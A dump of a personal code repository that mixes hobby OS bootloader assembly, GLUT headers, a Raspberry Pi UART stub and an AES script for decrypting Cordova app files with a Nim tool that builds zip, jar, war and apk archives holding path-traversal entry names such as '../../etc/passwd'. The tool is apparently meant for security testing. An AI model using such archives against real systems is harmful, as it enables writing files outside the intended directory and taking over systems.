32 | mov eax, 10100000b ; Set the PAE and PGE bit.
33 | mov cr4, eax
34 | mov edx, edi ; Point CR3 at the PML4.
35 | mov cr3, edx
36 | mov ecx, 0xC0000080 ; Read from the EFER MSR.
37 | rdmsr
38 | or eax, 0x00000100 ; Set the LME bit.
39 | wrmsr
40 | mov ebx, cr0 ; Activate long mode
41 | or ebx,0x80000001 ; by enabling paging and protection simultaneously.
42 | mov cr0, ebx
43 | lgdt [GDT.Pointer] ; Load GDT.Pointer.
44 | jmp CODE_SEG:Kernel ; Load CS with 64 bit segment and flush the instruction cache.
45 |
--------------------------------------------------------------------------------
/os/part5/stage2/longmode.asm:
--------------------------------------------------------------------------------
1 | ; Author: Alamot
2 |
3 | BITS 16
4 |
5 | ;---Code------------------------------------------------------------------------
6 | Is_longmode_supported:
7 | ;********************************************************************;
8 | ; Check if Long mode is supported ;
9 | ;--------------------------------------------------------------------;
10 | ; Returns: eax = 0 if Long mode is NOT supported, else non-zero. ;
11 | ;********************************************************************;
12 | mov eax, 0x80000000 ; Test if extended processor info in available.
13 | cpuid
14 | cmp eax, 0x80000001
15 | jb .not_supported
16 |
17 | mov eax, 0x80000001 ; After calling CPUID with EAX = 0x80000001,
18 | cpuid ; all AMD64 compliant processors have the longmode-capable-bit
19 | test edx, (1 << 29) ; (bit 29) turned on in the EDX (extended feature flags).
20 |
21 | jz .not_supported ; If it's not set, there is no long mode.
22 | ret
23 |
24 | .not_supported:
25 | xor eax, eax
26 | ret
27 |
28 |
29 | Enter_long_mode:
30 | ;********************************************************************;
31 | ; Enter long mode ;
32 | ;********************************************************************;
33 | mov edi, PAGING_DATA ; Point edi at the PAGING_DATA.
34 | mov eax, 10100000b ; Set the PAE and PGE bit.
35 | mov cr4, eax
36 | mov edx, edi ; Point CR3 at the PML4.
37 | mov cr3, edx
38 | mov ecx, 0xC0000080 ; Read from the EFER MSR.
39 | rdmsr
40 | or eax, 0x00000100 ; Set the LME bit.
41 | wrmsr
42 | mov ebx, cr0 ; Activate long mode
43 | or ebx,0x80000001 ; by enabling paging and protection simultaneously.
44 | mov cr0, ebx
45 | lgdt [GDT.Pointer] ; Load GDT.Pointer.
46 | jmp CODE_SEG:Kernel ; Load CS with 64 bit segment and flush the instruction cache.
47 |
--------------------------------------------------------------------------------
/os/part5/stage2/e280_mapping.asm:
--------------------------------------------------------------------------------
1 | ; Author: Alamot
2 |
3 | BITS 16
4 |
5 | ;---Initialized data------------------------------------------------------------
6 | e820_mmap_entries db 0
7 | e820_mmap_buffer: times 128*20 db 0 ; Allocate space for 128 E820 map entries.
8 |
9 | ;---Code------------------------------------------------------------------------
10 | Get_E820_map:
11 | ;******************************************************************************;
12 | ; Prepare paging ;
13 | ;------------------------------------------------------------------------------;
14 | ; Rerurns: ;
15 | ; bx = number of entries (Each entry is 20 bytes) ;
16 | ; es:di = start of array (you decide where) ;
17 | ;******************************************************************************;
18 | pusha ; Store registers
19 | push es
20 | xor ebx, ebx ; ebx = 0 (continuation value / entry counter)
21 | mov di, e820_mmap_buffer ; es:di = destination buffer
22 | xor ax, ax
23 | mov es, ax ; es = 0 (buffer below 1MB).
24 | .next_entry:
25 | mov eax, 0xE820 ; eax = 0xE820
26 | mov edx, 0x534D4150 ; edx = 'SMAP'
27 | mov ecx, 20 ; ecx = size of buffer (at least 20)
28 | mov [abs e820_mmap_entries], ebx ; Store number of entries
29 | int 0x15 ; Call BIOS interrupt 15
30 | jc .done ; CF=1 => Unsupported function (or error or end)
31 | cmp eax, 0x534D4150 ; On success, eax must have been reset to "SMAP"
32 | jne .done
33 | test ebx, ebx ; ebx = 0 => List is only 1 entry (worthless)
34 | je .done
35 | add di, 20 ; Next buffer slot
36 | cmp ebx, 128 ; Limit to 128 entries
37 | jae .done
38 | jmp .next_entry
39 | .done:
40 | pop es
41 | popa ; Restore registers
42 | ret
43 |
--------------------------------------------------------------------------------
/crypto/cordova-aes.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python2
2 | # Author: Alamot
3 | import os
4 | import sys
5 | import glob
6 | import errno
7 | import base64
8 | from Crypto import Random
9 | from Crypto.Cipher import AES
10 |
11 |
12 | class AESCipher:
13 | def __init__(self, key, iv):
14 | self.key = key
15 | self.iv = iv
16 |
17 | def encrypt(self, source):
18 | cipher = AES.new(self.key, AES.MODE_CBC, self.iv)
19 | padding = AES.block_size - len(source) % AES.block_size
20 | data = source + chr(padding) * padding
21 | return base64.b64encode(cipher.encrypt(data))
22 |
23 | def decrypt(self, source):
24 | cipher = AES.new(self.key, AES.MODE_CBC, self.iv)
25 | data = cipher.decrypt(base64.b64decode(source))
26 | padding = ord(data[-1])
27 | if data[-padding:] != chr(padding) * padding:
28 | raise ValueError("Invalid padding...")
29 | return data[:-padding]
30 |
31 |
32 | def makedir(directory):
33 | ''' Make a directory. '''
34 | try:
35 | os.makedirs(directory)
36 | except OSError as e:
37 | if e.errno != errno.EEXIST:
38 | print("[E] makedir")
39 |
40 |
41 | if len(sys.argv) < 5 or sys.argv[1] not in ["dec", "enc"]:
42 | print("Usage: python cordova-aes.py ")
43 | sys.exit(1)
44 |
45 | action = sys.argv[1]
46 | key = sys.argv[2]
47 | iv = sys.argv[3]
48 | files = sys.argv[4:]
49 | cipher = AESCipher(key, iv)
50 |
51 | makedir(action)
52 |
53 | if type(files) == str:
54 | files = [files]
55 |
56 | for filename in files:
57 | out_path = action + "/" + filename
58 | with open(filename, 'r') as inf:
59 | data = inf.read()
60 | if action == "dec":
61 | data = data.replace('\n', '')
62 | with open(out_path, "w") as f:
63 | f.write(cipher.decrypt(data))
64 | print("[+] Decrypted data have been written into '" + out_path + "'")
65 | elif action == "enc":
66 | with open(out_path, "w") as f:
67 | f.write(cipher.encrypt(data))
68 | print("[+] Encrypted data have been written into '" + out_path + "'")
69 |
--------------------------------------------------------------------------------
/os/part1/stage1/bootstage1.asm:
--------------------------------------------------------------------------------
1 | BITS 16 ; On the x86, the BIOS (and consequently the bootloader) runs in 16-bit Real Mode.
2 | ORG 0x7C00 ; We are loaded/booted by BIOS into this memory address.
3 |
4 | Stage1_entrypoint: ; Main entry point where BIOS leaves us. Some BIOS may load us at 0x0000:0x7C00 while others at 0x07C0:0x0000. We do a far jump to accommodate for this issue (CS is reloaded to 0x0000).
5 | jmp 0x0000:.setup_segments
6 | .setup_segments:
7 | ; Next, we set all segment registers to zero.
8 | xor ax, ax
9 | mov ss, ax
10 | mov ds, ax
11 | mov es, ax
12 | mov fs, ax
13 | mov gs, ax
14 | ; We set up a temporary stack so that it starts growing below Stage1_entrypoint (i.e. the stack base will be located at 0:0x7c00).
15 | mov sp, Stage1_entrypoint
16 | ; Clear direction flag (go forward in memory when using instructions like lodsb).
17 | cld
18 |
19 | ; Loading stage 2 from disk into RAM
20 | mov [disk], dl ; Storing disk number. BIOS loads into dl the "drive number" of the booted device.
21 | mov ax, (stage2_start-stage1_start)/512 ; ax: start sector
22 | mov cx, (kernel_end-stage2_start)/512 ; cx: number of sectors (512 bytes) to read
23 | mov bx, stage2_start ; bx: offset of buffer
24 | xor dx, dx ; dx: segment of buffer
25 | call Real_mode_read_disk
26 |
27 | ; Print "Stage 1 finished." message.
28 | mov si, stage1_message
29 | call Real_mode_println
30 |
31 | ; Jump to the entry point of stage 2 (commented out for now)
32 | ;;; jmp Stage2_entrypoint
33 |
34 | .halt: hlt ; Infinite loop.
35 | jmp .halt ; (It prevents from going off in memory and executing junk).
36 |
37 |
38 | ; Include
39 | %include "stage1/disk.asm"
40 | %include "stage1/print.asm"
41 |
42 |
43 | times 510-($-$$) db 0 ; Padding
44 | dw 0xAA55 ; The last two bytes of the boot sector should have the 0xAA55 signature.
45 | ; Otherwise, we'll get an error message from BIOS that it didn't find a bootable disk.
46 | ; This signature is represented in binary as 1010101001010101. The alternating bit
47 | ; pattern was thought to be a protection against certain (drive or controller) failures.
48 |
--------------------------------------------------------------------------------
/os/part2/stage1/bootstage1.asm:
--------------------------------------------------------------------------------
1 | BITS 16 ; On the x86, the BIOS (and consequently the bootloader) runs in 16-bit Real Mode.
2 | ORG 0x7C00 ; We are loaded/booted by BIOS into this memory address.
3 |
4 | Stage1_entrypoint: ; Main entry point where BIOS leaves us. Some BIOS may load us at 0x0000:0x7C00 while others at 0x07C0:0x0000.
5 | jmp 0x0000:.setup_segments ; We do a far jump to accommodate for this issue (CS is reloaded to 0x0000).
6 | .setup_segments: ; Next, we set all segment registers to zero.
7 | xor ax, ax
8 | mov ss, ax
9 | mov ds, ax
10 | mov es, ax
11 | mov fs, ax
12 | mov gs, ax
13 | mov sp, Stage1_entrypoint ; We set up a temporary stack so that it starts growing below Stage1_entrypoint (i.e. the stack base will be located at 0:0x7c00).
14 | cld ; Clear the direction flag (i.e. go forward in memory when using instructions like lodsb).
15 |
16 | ; Loading stage 2 from disk into RAM
17 | mov [disk], dl ; Storing disk number. BIOS loads into dl the "drive number" of the booted device.
18 | mov ax, (stage2_start-stage1_start)/512 ; ax: start sector
19 | mov cx, (kernel_end-stage2_start)/512 ; cx: number of sectors (512 bytes) to read
20 | mov bx, stage2_start ; bx: offset of buffer
21 | xor dx, dx ; dx: segment of buffer
22 | call Real_mode_read_disk
23 |
24 | ; Print "Stage 1 finished." message.
25 | mov si, stage1_message
26 | call Real_mode_println
27 |
28 | ; Jump to the entry point of stage 2 (commented out for now)
29 | jmp Stage2_entrypoint
30 |
31 | .halt: hlt
32 | jmp .halt ; Infinite loop (it prevents us from going off and executing other junk in memory).
33 |
34 |
35 | ; Include
36 | %include "stage1/disk.asm"
37 | %include "stage1/print.asm"
38 |
39 |
40 | times 510-($-$$) db 0 ; Padding
41 | dw 0xAA55 ; The last two bytes of the boot sector should have the 0xAA55 signature.
42 | ; Otherwise, we'll get an error message from BIOS that it didn't find a bootable disk.
43 | ; This signature is represented in binary as 1010101001010101. The alternating bit
44 | ; pattern was thought to be a protection against certain (drive or controller) failures.
45 |
--------------------------------------------------------------------------------
/os/part3/stage1/bootstage1.asm:
--------------------------------------------------------------------------------
1 | BITS 16 ; On the x86, the BIOS (and consequently the bootloader) runs in 16-bit Real Mode.
2 | ORG 0x7C00 ; We are loaded/booted by BIOS into this memory address.
3 |
4 | Stage1_entrypoint: ; Main entry point where BIOS leaves us. Some BIOS may load us at 0x0000:0x7C00 while others at 0x07C0:0x0000.
5 | jmp 0x0000:.setup_segments ; We do a far jump to accommodate for this issue (CS is reloaded to 0x0000).
6 | .setup_segments: ; Next, we set all segment registers to zero.
7 | xor ax, ax
8 | mov ss, ax
9 | mov ds, ax
10 | mov es, ax
11 | mov fs, ax
12 | mov gs, ax
13 | mov sp, Stage1_entrypoint ; We set up a temporary stack so that it starts growing below Stage1_entrypoint (i.e. the stack base will be located at 0:0x7c00).
14 | cld ; Clear the direction flag (i.e. go forward in memory when using instructions like lodsb).
15 |
16 | ; Loading stage 2 from disk into RAM
17 | mov [disk], dl ; Storing disk number. BIOS loads into dl the "drive number" of the booted device.
18 | mov ax, (stage2_start-stage1_start)/512 ; ax: start sector
19 | mov cx, (kernel_end-stage2_start)/512 ; cx: number of sectors (512 bytes) to read
20 | mov bx, stage2_start ; bx: offset of buffer
21 | xor dx, dx ; dx: segment of buffer
22 | call Real_mode_read_disk
23 |
24 | ; Print "Stage 1 finished." message.
25 | mov si, stage1_message
26 | call Real_mode_println
27 |
28 | ; Jump to the entry point of stage 2 (commented out for now)
29 | jmp Stage2_entrypoint
30 |
31 | .halt: hlt
32 | jmp .halt ; Infinite loop (it prevents us from going off and executing other junk in memory).
33 |
34 |
35 | ; Include
36 | %include "stage1/disk.asm"
37 | %include "stage1/print.asm"
38 |
39 |
40 | times 510-($-$$) db 0 ; Padding
41 | dw 0xAA55 ; The last two bytes of the boot sector should have the 0xAA55 signature.
42 | ; Otherwise, we'll get an error message from BIOS that it didn't find a bootable disk.
43 | ; This signature is represented in binary as 1010101001010101. The alternating bit
44 | ; pattern was thought to be a protection against certain (drive or controller) failures.
45 |
--------------------------------------------------------------------------------
/os/part4/stage1/bootstage1.asm:
--------------------------------------------------------------------------------
1 | BITS 16 ; On the x86, the BIOS (and consequently the bootloader) runs in 16-bit Real Mode.
2 | ORG 0x7C00 ; We are loaded/booted by BIOS into this memory address.
3 |
4 | Stage1_entrypoint: ; Main entry point where BIOS leaves us. Some BIOS may load us at 0x0000:0x7C00 while others at 0x07C0:0x0000.
5 | jmp 0x0000:.setup_segments ; We do a far jump to accommodate for this issue (CS is reloaded to 0x0000).
6 | .setup_segments: ; Next, we set all segment registers to zero.
7 | xor ax, ax
8 | mov ss, ax
9 | mov ds, ax
10 | mov es, ax
11 | mov fs, ax
12 | mov gs, ax
13 | mov sp, Stage1_entrypoint ; We set up a temporary stack so that it starts growing below Stage1_entrypoint (i.e. the stack base will be located at 0:0x7c00).
14 | cld ; Clear the direction flag (i.e. go forward in memory when using instructions like lodsb).
15 |
16 | ; Loading stage 2 from disk into RAM
17 | mov [disk], dl ; Storing disk number. BIOS loads into dl the "drive number" of the booted device.
18 | mov ax, (stage2_start-stage1_start)/512 ; ax: start sector
19 | mov cx, (kernel_end-stage2_start)/512 ; cx: number of sectors (512 bytes) to read
20 | mov bx, stage2_start ; bx: offset of buffer
21 | xor dx, dx ; dx: segment of buffer
22 | call Real_mode_read_disk
23 |
24 | ; Print "Stage 1 finished." message.
25 | mov si, stage1_message
26 | call Real_mode_println
27 |
28 | ; Jump to the entry point of stage 2 (commented out for now)
29 | jmp Stage2_entrypoint
30 |
31 | .halt: hlt
32 | jmp .halt ; Infinite loop (it prevents us from going off and executing other junk in memory).
33 |
34 |
35 | ; Include
36 | %include "stage1/disk.asm"
37 | %include "stage1/print.asm"
38 |
39 |
40 | times 510-($-$$) db 0 ; Padding
41 | dw 0xAA55 ; The last two bytes of the boot sector should have the 0xAA55 signature.
42 | ; Otherwise, we'll get an error message from BIOS that it didn't find a bootable disk.
43 | ; This signature is represented in binary as 1010101001010101. The alternating bit
44 | ; pattern was thought to be a protection against certain (drive or controller) failures.
45 |
--------------------------------------------------------------------------------
/graphics/SutherlandHodgman/Linux/zpr.h:
--------------------------------------------------------------------------------
1 | #ifndef ZPR_H
2 | #define ZPR_H
3 |
4 | /*
5 | * Zoom-pan-rotate mouse manipulation module for GLUT
6 | * Version 0.4, October 2003
7 | *
8 | * Nigel Stewart
9 | * School of Computer Science and Information Technology
10 | * RMIT University
11 | * nigels@cs.rmit.edu.au
12 | *
13 | * Instructions
14 | * ------------
15 | *
16 | * Call zprInit() immediately after your call to glutCreateWindow()
17 | *
18 | * The ZPR module handles glutReshapeFunc(), glutMouseFunc() and glutMotionFunc()
19 | * Applications should not bypass the ZPR handlers for reshape or mouse events.
20 | *
21 | * Mouse manipulation of the GLUT window via the modelview matrix:
22 | *
23 | * Left button -> rotate
24 | * Middle button -> zoom
25 | * Right button -> pan
26 | *
27 | * Picking is also provided via two configurable callbacks:
28 | *
29 | * void zprSelectionFunc(void (*f)(void))
30 | *
31 | * The draw function to be called in OpenGL selection
32 | * mode in response to a mouse-down button event.
33 | *
34 | * void zprPickFunc(void (*f)(GLint name))
35 | *
36 | * The callback function which will receive the
37 | * top-most item of the name stack of the closest selection
38 | * hit. If there is no selection hit, -1
39 | *
40 | * Limitations
41 | * -----------
42 | *
43 | * Works best with zprReferencePoint appropriately configured.
44 | * Works best with ortho projection.
45 | * You may need to use glEnable(GL_NORMALIZATION) for correct lighting.
46 | * Near and far clip planes are hard-coded.
47 | * Zooming and rotation is centered on the origin.
48 | * Only one window can use the callbacks at one time.
49 | *
50 | */
51 |
52 | #ifdef WIN32
53 | #include
54 | #endif
55 |
56 | #include
57 |
58 | #ifdef __cplusplus
59 | extern "C"
60 | {
61 | #endif
62 |
63 | /*
64 | *
65 | */
66 |
67 | /* Mouse Manipulation API */
68 |
69 | void zprInit();
70 |
71 | extern GLfloat zprReferencePoint[4];
72 |
73 | /* Picking API (Optional) */
74 |
75 | extern void zprSelectionFunc(void (*f)(void)); /* Selection-mode draw function */
76 | extern void zprPickFunc(void (*f)(GLint name)); /* Pick event handling function */
77 |
78 | /*
79 | *
80 | */
81 |
82 | #ifdef __cplusplus
83 | }
84 | #endif
85 |
86 | #endif
87 |
--------------------------------------------------------------------------------
/os/part5/stage1/bootstage1.asm:
--------------------------------------------------------------------------------
1 | ; Author: Alamot
2 |
3 | BITS 16 ; On the x86, the BIOS (and consequently the bootloader) runs in 16-bit Real Mode.
4 | ORG 0x7C00 ; We are loaded/booted by BIOS into this memory address.
5 |
6 | Stage1_entrypoint: ; Main entry point where BIOS leaves us. Some BIOS may load us at 0x0000:0x7C00 while others at 0x07C0:0x0000.
7 | jmp 0x0000:.setup_segments ; We do a far jump to accommodate for this issue (CS is reloaded to 0x0000).
8 | .setup_segments: ; Next, we set all segment registers to zero.
9 | xor ax, ax
10 | mov ss, ax
11 | mov ds, ax
12 | mov es, ax
13 | mov fs, ax
14 | mov gs, ax
15 | mov sp, Stage1_entrypoint ; We set up a temporary stack so that it starts growing below Stage1_entrypoint (i.e. the stack base will be located at 0:0x7c00).
16 | cld ; Clear the direction flag (i.e. go forward in memory when using instructions like lodsb).
17 |
18 | ; Loading stage 2 from disk into RAM
19 | mov [disk], dl ; Storing disk number. BIOS loads into dl the "drive number" of the booted device.
20 | mov ax, (stage2_start-stage1_start)/512 ; ax: start sector
21 | mov cx, (kernel_end-stage2_start)/512 ; cx: number of sectors (512 bytes) to read
22 | mov bx, stage2_start ; bx: offset of buffer
23 | xor dx, dx ; dx: segment of buffer
24 | call Real_mode_read_disk
25 |
26 | ; Print "Stage 1 finished." message.
27 | mov si, stage1_message
28 | call Real_mode_println
29 |
30 | ; Jump to the entry point of stage 2 (commented out for now)
31 | jmp Stage2_entrypoint
32 |
33 | .halt: hlt
34 | jmp .halt ; Infinite loop (it prevents us from going off and executing other junk in memory).
35 |
36 |
37 | ; Include
38 | %include "stage1/disk.asm"
39 | %include "stage1/print.asm"
40 |
41 |
42 | times 510-($-$$) db 0 ; Padding
43 | dw 0xAA55 ; The last two bytes of the boot sector should have the 0xAA55 signature.
44 | ; Otherwise, we'll get an error message from BIOS that it didn't find a bootable disk.
45 | ; This signature is represented in binary as 1010101001010101. The alternating bit
46 | ; pattern was thought to be a protection against certain (drive or controller) failures.
47 |
--------------------------------------------------------------------------------
/graphics/SutherlandHodgman/Windows/SutherlandHodgman/zpr.h:
--------------------------------------------------------------------------------
1 | #ifndef ZPR_H
2 | #define ZPR_H
3 |
4 | /*
5 | * Zoom-pan-rotate mouse manipulation module for GLUT
6 | * Version 0.4, October 2003
7 | *
8 | * Nigel Stewart
9 | * School of Computer Science and Information Technology
10 | * RMIT University
11 | * nigels@cs.rmit.edu.au
12 | *
13 | * Instructions
14 | * ------------
15 | *
16 | * Call zprInit() immediately after your call to glutCreateWindow()
17 | *
18 | * The ZPR module handles glutReshapeFunc(), glutMouseFunc() and glutMotionFunc()
19 | * Applications should not bypass the ZPR handlers for reshape or mouse events.
20 | *
21 | * Mouse manipulation of the GLUT window via the modelview matrix:
22 | *
23 | * Left button -> rotate
24 | * Middle button -> zoom
25 | * Right button -> pan
26 | *
27 | * Picking is also provided via two configurable callbacks:
28 | *
29 | * void zprSelectionFunc(void (*f)(void))
30 | *
31 | * The draw function to be called in OpenGL selection
32 | * mode in response to a mouse-down button event.
33 | *
34 | * void zprPickFunc(void (*f)(GLint name))
35 | *
36 | * The callback function which will receive the
37 | * top-most item of the name stack of the closest selection
38 | * hit. If there is no selection hit, -1
39 | *
40 | * Limitations
41 | * -----------
42 | *
43 | * Works best with zprReferencePoint appropriately configured.
44 | * Works best with ortho projection.
45 | * You may need to use glEnable(GL_NORMALIZATION) for correct lighting.
46 | * Near and far clip planes are hard-coded.
47 | * Zooming and rotation is centered on the origin.
48 | * Only one window can use the callbacks at one time.
49 | *
50 | */
51 |
52 | #ifdef WIN32
53 | #include
54 | #endif
55 |
56 | #include
57 |
58 | #ifdef __cplusplus
59 | extern "C"
60 | {
61 | #endif
62 |
63 | /*
64 | *
65 | */
66 |
67 | /* Mouse Manipulation API */
68 |
69 | void zprInit();
70 |
71 | extern GLfloat zprReferencePoint[4];
72 |
73 | /* Picking API (Optional) */
74 |
75 | extern void zprSelectionFunc(void (*f)(void)); /* Selection-mode draw function */
76 | extern void zprPickFunc(void (*f)(GLint name)); /* Pick event handling function */
77 |
78 | /*
79 | *
80 | */
81 |
82 | #ifdef __cplusplus
83 | }
84 | #endif
85 |
86 | #endif
87 |
--------------------------------------------------------------------------------
/os/part3/kernel/kernel.asm:
--------------------------------------------------------------------------------
1 | BITS 64 ; We have entered the long mode! :)
2 |
3 | ;---Define----------------------------------------------------------------------
4 | %define DATA_SEG 0x0010
5 |
6 | ;---Initialized data------------------------------------------------------------
7 | hello_world_message dw 12
8 | db 'Hello World!'
9 |
10 | ticks_message dw 19
11 | db 'System timer ticks:'
12 |
13 | scancode_message dw 19
14 | db 'Keyboard scan code:'
15 |
16 | ;---Include---------------------------------------------------------------------
17 | %include "kernel/idt.asm"
18 | %include "kernel/isr.asm"
19 | %include "kernel/video.asm"
20 |
21 | ;---Code------------------------------------------------------------------------
22 | Kernel:
23 | lidt [IDTR] ; Load our IDTR
24 |
25 | mov al, 0x80 ; OCW1: Unmask all interrupts at master PIC
26 | out PIC1_DATA, al
27 | mov al, 0x80 ; OCW1: Unmask all interrupts at master PIC
28 | out PIC2_DATA, al
29 |
30 | ; Set all segments registers to DATA_SEG
31 | mov ax, DATA_SEG
32 | mov ds, ax
33 | mov es, ax
34 | mov fs, ax
35 | mov gs, ax
36 | mov ss, ax
37 |
38 | ; Clear the screen.
39 | mov rax, 0x0020002000200020 ; Set background color to black (0) and
40 | ; character to blank space (20).
41 | call Fill_screen
42 |
43 | ; Print "Hello World!" at the upper right corner
44 | mov ah, 0x1E
45 | mov r8, 69
46 | mov r9, 1
47 | mov rsi, hello_world_message
48 | call Print
49 |
50 | ; Uncomment the following lines if you want to test the "Division by zero" exception.
51 | ; mov eax, 1
52 | ; mov ecx, 0
53 | ; div ecx
54 |
55 | .loop:
56 | ; Print system timer ticks.
57 | mov ah, VGA_COLOR_LIGHT_GREEN
58 | mov r8, 1
59 | mov r9, 2
60 | mov rsi, ticks_message
61 | Call Print
62 | mov r8, 21
63 | mov r9, 2
64 | mov r10, [systimer_ticks]
65 | call Print_hex
66 | ; Print keyboard scan code.
67 | mov ah, VGA_COLOR_LIGHT_CYAN
68 | mov r8, 1
69 | mov r9, 4
70 | mov rsi, scancode_message
71 | Call Print
72 | mov r8, 21
73 | mov r9, 4
74 | mov r10, [keyboard_scancode]
75 | call Print_hex
76 | jmp .loop ; Infinite loop.
77 |
--------------------------------------------------------------------------------
/graphics/SutherlandHodgman/Windows/SutherlandHodgman/SutherlandHodgman.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 | Source Files
23 |
24 |
25 |
26 |
27 | Header Files
28 |
29 |
30 | Header Files
31 |
32 |
33 | Header Files
34 |
35 |
36 | Header Files
37 |
38 |
39 | Header Files
40 |
41 |
42 | Header Files
43 |
44 |
45 | Header Files
46 |
47 |
48 | Header Files
49 |
50 |
51 | Header Files
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
--------------------------------------------------------------------------------
/path_traversal/path_traversal_archiver.nim:
--------------------------------------------------------------------------------
1 | import os
2 | import therapist
3 | import std/tables
4 | import std/streams
5 | import std/sequtils
6 | import std/strutils
7 | import zip/zipfiles
8 |
9 | let ext_mode = {".zip":fmWrite, ".jar":fmWrite, ".war":fmWrite, ".apk":fmWrite}.toOrderedTable
10 | let exts = toSeq(ext_mode.keys)
11 |
12 | let args = (
13 | levels: newStringArg(@["-l", "--levels"], defaultVal="0-10", help="A single level or a range of levels to traverse."),
14 | os: newStringArg(@["-o", "--os"], defaultVal="unix", choices = @["unix", "win"], help="Target OS (unix|win)."),
15 | path: newStringArg(@["-p", "--path"], defaultVal="", help="Path to include (e.g. 'etc/')."),
16 | help: newHelpArg(@["-h", "--help"], help="Show this help message and exit"),
17 | file_to_add: newFileArg(@[""], help="File to add in the archive."),
18 | archive: newStringArg(@[""], help="Archive filename (Supported extensions are .zip, .jar, .war, .apk)."),
19 | )
20 |
21 |
22 | proc make_traversal_path(path: string, level: int = 0, os: string = "unix"): string =
23 | if os == "win":
24 | let traversal = "..\\"
25 | let fullpath = traversal.repeat(level) & path
26 | return fullpath.replace("/", "\\").replace("\\\\", "\\")
27 | else:
28 | let traversal = "../"
29 | let fullpath = traversal.repeat(level) & path
30 | return fullpath.replace("\\", "/").replace("//", "/")
31 |
32 |
33 | args.parseOrHelp(prolog="Path Traversal Archiver: A tool to create archives containing path-traversal filenames (e.g. '../../etc/passwd').")
34 |
35 | var start = 0
36 | var final = 0
37 | try:
38 | if "-" in args.levels.value:
39 | let values = split(args.levels.value, "-")
40 | start = parseInt(values[0])
41 | final = parseInt(values[1])
42 | else:
43 | start = parseInt(args.levels.value)
44 | final = start
45 | except ValueError:
46 | "Please specify a single level (e.g. 3) or a level range (e.g. 1-10) for path traversal.".quit(-1)
47 |
48 | let splittedFile = splitFile(args.archive.value)
49 | let path = args.path.value & lastPathPart(args.file_to_add.value)
50 |
51 | if not ext_mode.hasKey(splittedFile.ext):
52 | let message = "Please specify a supported extention " & $exts & " in the archive filename: " & args.archive.value
53 | message.quit(-1)
54 | elif splittedFile.ext in [".zip", ".jar", ".war", ".apk"]:
55 | echo "Creating archive " & args.archive.value
56 | var z: ZipArchive
57 | if z.open(args.archive.value, ext_mode[splittedFile.ext]):
58 | for i in countup(start, final):
59 | let fullpath = make_traversal_path(path, level=i, os=args.os.value)
60 | echo "[+] Adding " & fullpath
61 | z.addFile(fullpath, newFileStream(args.file_to_add.value, fmRead))
62 | z.close()
63 | else:
64 | let message = "Extention '" & splittedFile.ext & "' not supported."
65 | message.quit(-1)
66 |
--------------------------------------------------------------------------------
/os/part2/stage2/longmode.asm:
--------------------------------------------------------------------------------
1 | ; Author: Alamot
2 |
3 | BITS 16
4 |
5 | ;---Code------------------------------------------------------------------------
6 | Is_longmode_supported:
7 | ;********************************************************************;
8 | ; Check if Long mode is supported ;
9 | ;--------------------------------------------------------------------;
10 | ; Returns: eax = 0 if Long mode is NOT supported, else non-zero. ;
11 | ;********************************************************************;
12 | mov eax, 0x80000000 ; Test if extended processor info in available.
13 | cpuid
14 | cmp eax, 0x80000001
15 | jb .not_supported
16 | mov eax, 0x80000001 ; After calling CPUID with EAX = 0x80000001,
17 | cpuid ; all AMD64 compliant processors have the longmode-capable-bit
18 | test edx, (1 << 29) ; (bit 29) turned on in the EDX (extended feature flags).
19 | jz .not_supported ; If it's not set, there is no long mode.
20 | ret
21 | .not_supported:
22 | xor eax, eax
23 | ret
24 |
25 |
26 | Enter_long_mode:
27 | ;********************************************************************;
28 | ; Enter long mode ;
29 | ;********************************************************************;
30 | mov edi, PML4 ; Point edi at the PML4
31 | mov eax, 10100000b ; Set the PAE and PGE bit.
32 | mov cr4, eax
33 | mov edx, edi ; Point CR3 at the PML4.
34 | mov cr3, edx
35 | mov ecx, 0xC0000080 ; Read from the EFER MSR.
36 | rdmsr
37 | or eax, 0x00000100 ; Set the LME bit.
38 | wrmsr
39 | mov ebx, cr0 ; Activate long mode
40 | or ebx,0x80000001 ; by enabling paging and protection simultaneously.
41 | mov cr0, ebx
42 | lgdt [rel GDTR] ; Load GDT.Pointer
43 | jmp CODE_SEL:LONGMODE ; Mode-Switch Jump (Load CS & flush instruction cache)
44 | LONGMODE:
45 | BITS 64 ; We have entered the long mode! :)
46 | mov ax, DATA_SEL ; Set all segments registers to DATA_SEL.
47 | mov ds, ax
48 | mov es, ax
49 | mov fs, ax
50 | mov gs, ax
51 | mov ss, ax
52 | mov rax, KERNEL_VIRT_BASE + HIGH_KERNEL
53 | jmp rax ; Jump to high-address mapped kernel
54 | HIGH_KERNEL:
55 | lea rax, [rel GDT] ; Load our high-address GDT
56 | mov [rel GDTR.Base], rax
57 | lgdt [rel GDTR]
58 | add rsp, KERNEL_VIRT_BASE ; Point rsp (stack) to its high address
59 | mov qword [abs KERNEL_VIRT_BASE + PML4], 0 ; Clear PML4[0] (identity entry)
60 | mov rax, cr3 ; Flush the TLB (Translation Lookaside Buffer)
61 | mov cr3, rax ; Reload CR3 to flush TLB
62 | jmp Kernel_entrypoint ; Jump to Kernel entrypoint
63 |
--------------------------------------------------------------------------------
/raspberry_pi_os/part1/uart.S:
--------------------------------------------------------------------------------
1 | /*---Constants----------------------------------------------------------------*/
2 |
3 | // Raspberry Pi 3B+
4 | .equ PERIPH_BASE, 0x3F000000 /* <--- Uncomment this for Pi 3 */
5 |
6 | // Raspberry Pi 4B
7 | //.equ PERIPH_BASE, 0xFE000000 /* <--- Uncomment this for Pi 4 */
8 |
9 | .equ UART0_BASE, (PERIPH_BASE + 0x201000) // UART base address
10 | .equ UART0_DR, (UART0_BASE + 0x00) // UART Data Register
11 | .equ UART0_FR, (UART0_BASE + 0x18) // UART Flag Register
12 | .equ TXFF_BIT, (1 << 5) // Transmit FIFO Full bit
13 |
14 |
